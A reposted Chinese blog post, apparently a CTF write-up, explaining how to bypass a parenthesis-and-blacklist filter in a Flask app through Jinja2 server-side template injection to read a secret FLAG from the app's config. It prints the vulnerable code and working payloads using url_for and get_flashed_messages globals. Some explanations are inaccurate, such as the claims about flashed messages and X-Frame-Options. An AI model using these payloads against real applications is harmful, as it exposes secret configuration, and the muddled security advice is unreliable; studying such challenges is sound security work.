博客
关于我
2021-02-08
阅读量:297 次
发布时间:2019-03-01

本文共 1609 字,大约阅读时间需要 5 分钟。

如何通过Flask模板注入绕过过滤并获取FLAG

在Flask应用中,模板注入是一种常见的安全问题,特别是在模板引擎支持代码执行的情况下。以下是如何通过Flask模板注入绕过过滤并获取FLAG的一种方法。

1. 代码分析

首先,我们来看提供的Flask代码:

import flaskimport osapp = flask.Flask(__name__)app.config['FLAG'] = os.environ.pop('FLAG')@app.route('/')def index():    return open(__file__).read()@app.route('/shrine/
')def shrine(shrine): def safe_jinja(s): s = s.replace('(', '').replace(')', '') blacklist = ['config', 'self'] return ''.join(['{ {% set {}=None%}}'.format(c) for c in blacklist]) + s return flask.render_template_string(safe_jinja(shrine))

2. 过滤机制

代码中定义了safe_jinja函数用于过滤输入。该函数执行以下操作:

  • 替换所有括号()为空。
  • 定义一个黑名单['config', 'self']
  • 将黑名单中的每个关键字替换为空,例如{% set config=None %}
  • 3. 绕过过滤

    尽管safe_jinja函数进行了过滤,但仍然存在多种方法绕过其保护措施。以下是一些常见的绕过方法:

    方法一:利用url_for获取全局变量

    Flask模板引擎支持url_for函数,该函数可以用来生成URL,并接受参数以获取全局变量。例如:

    {{ url_for.__globals__['current_app'].config.FLAG }}

    通过这种方式,可以直接访问Flask应用的current_app对象,并从中获取配置信息,包括FLAG

    方法二:利用get_flashed_messages获取闪现信息

    get_flashed_messages函数用于获取Flask中通过flash()方法传递的闪现信息。例如:

    {{ get_flashed_messages.__globals__['current_app'].config.FLAG }}

    闪现信息可以包含我们想要获取的内容,包括FLAG

    4. 示例

    假设我们想要获取FLAG,可以构造以下模板:

    /shrine/{{ url_for.__globals__['current_app'].config.FLAG }}

    或者

    /shrine/{{ get_flashed_messages.__globals__['current_app'].config.FLAG }}

    5. 注意事项

    • 模板注入:这种方法依赖于模板引擎对变量解析的能力。如果模板引擎被禁用或限制,可能无法实现。
    • 过滤机制:即使进行了过滤,仍然可以通过url_forget_flashed_messages等函数绕过某些限制。
    • 安全性:Flask提供了一些安全功能,如模板过滤和X-Frame-Options,用于防止模板注入。建议结合这些功能进行全面安全性评估。

    6. 总结

    通过Flask模板注入,虽然safe_jinja函数进行了过滤,但仍然存在绕过保护措施的方法,例如利用url_forget_flashed_messages获取全局变量和闪现信息。因此,建议在Flask应用中谨慎使用模板注入,并结合其他安全措施来防止潜在的安全漏洞。

    转载地址:http://kelx.baihongyu.com/

    你可能感兴趣的文章
    Portaudio笔记-WASAPI
    查看>>
    position:fixed失效情况
    查看>>
    Qt开发笔记:QGLWidget、QOpenGLWidget详解及区别
    查看>>
    Position属性四个值:static、fixed、absolute和relative的区别和用法
    查看>>
    POSIX thread编程中关于临界区内条件变量的分析
    查看>>
    POSIX与程序可移植性
    查看>>
    posix多线程有感--自旋锁
    查看>>
    SpringBoot中集成海康威视SDK实现布防报警数据上传/交通违章图片上传并在linux上部署(附示例代码资源)
    查看>>
    POSIX标准和XSI扩展
    查看>>
    post install error,please remove node_moules before retry
    查看>>
    postcss-pxtorem 参数之selectorBlackList、exclude的用法
    查看>>
    Postek博思得标签打印机更换电脑,打印出来标签空白
    查看>>
    postfix+ dovecot搭建邮件服务器
    查看>>
    postfix在邮件服务器中的使用
    查看>>
    PostGIS 3.1.2软件安装详细教程(地图工具篇.8)
    查看>>
    PostGIS中获取所有EPSG的编码以及对应Proj4字符串
    查看>>
    SpringBoot中集成海康威视SDK实现布防报警数据上传/交通违章图片上传并在linux上部署(附示例代码资源)
    查看>>
    PostGIS在Windows上的下载与安装
    查看>>
    Qt开发——网络编程之UDP客户端
    查看>>
    postgis数据库优化_postgresql 性能优化
    查看>>